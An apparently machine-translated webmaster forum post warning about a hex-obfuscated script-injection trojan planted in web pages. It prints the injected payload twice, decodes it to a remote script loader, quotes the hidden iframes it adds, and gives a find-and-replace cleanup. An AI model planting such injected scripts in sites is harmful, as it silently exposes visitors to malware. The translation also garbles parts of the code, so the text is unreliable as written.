The webmaster in the horse come in and see!! Look who's shameless!! 1

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest stationmaster buy cloud host technology Hall

Recently there are many users of the Web page was Hung horse!
<script>document.writeln ("\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\ X2f\x4f\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\ X33\x25\x36\x35\x25\x37\x32\x76\x2e\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2f\x25\x34\x36\x25\x34\x31\x25\x35\ x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e ");</script>"
Latest Trojan
is hexadecimal
replaces \x with%, and then uses HTML code to convert the function to decode the
<script src=http://o%66%66%49%63e%2e%46%41q%53%65%72v.%43%6f%4d/% 46%41%51%2e%6a%73></script>
After conversion, decoding
The final JS output is
<script src=http://office.faqserv.com/faq.js ></script>
Faq.js inside is
document.write (' <iframe src= ' https://www.59.vc/page/add_54738542.htm ') Width= "1" height= "1" frameborder= "1" ></iframe> ");
document.write (' <iframe src= "https://OffIce.FAQServ.com/FAQ.htm" width= "1" height= "2" frameborder= "0" > </iframe> ');
Https://OffIce.FAQServ.com/faq.htm
Downloaded a string of code: <script language= "JavaScript src=" https://count18.51yes.com/click.aspxid=189404354 &logo=1 "></script>
The address of the Trojan is one of the 51yes
https://www.59.vc/page/add_54738542.htm"
Download down to discover such a string of code <script Src=addr.js></script><script language= "javascript" type= "Text/javascript" src= "Https://js.users.51.la/1542776.js" ></script>

to prevent everyone from poisoning, change HTTP to HTTPS
Temporary workaround:

Download text replacement expert : Http://sccrc.onlinedown.net/down/wfReplace26.rar
Place the generation

<script>document.writeln in a Web site ("\x3c\x73\ X63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x4f\x25\x36\x36\x25\x36\x36\x25\x34\x39\ X25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2e\x25\x34\ X33\x25\x36\x46\x25\x34\x44\x2f\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3e\ x3c\x2f\x73\x63\x72\x69\x70\x74\x3e "); </script>

instead of empty

Select the Web site path, replace it, and then re-enter the specialization.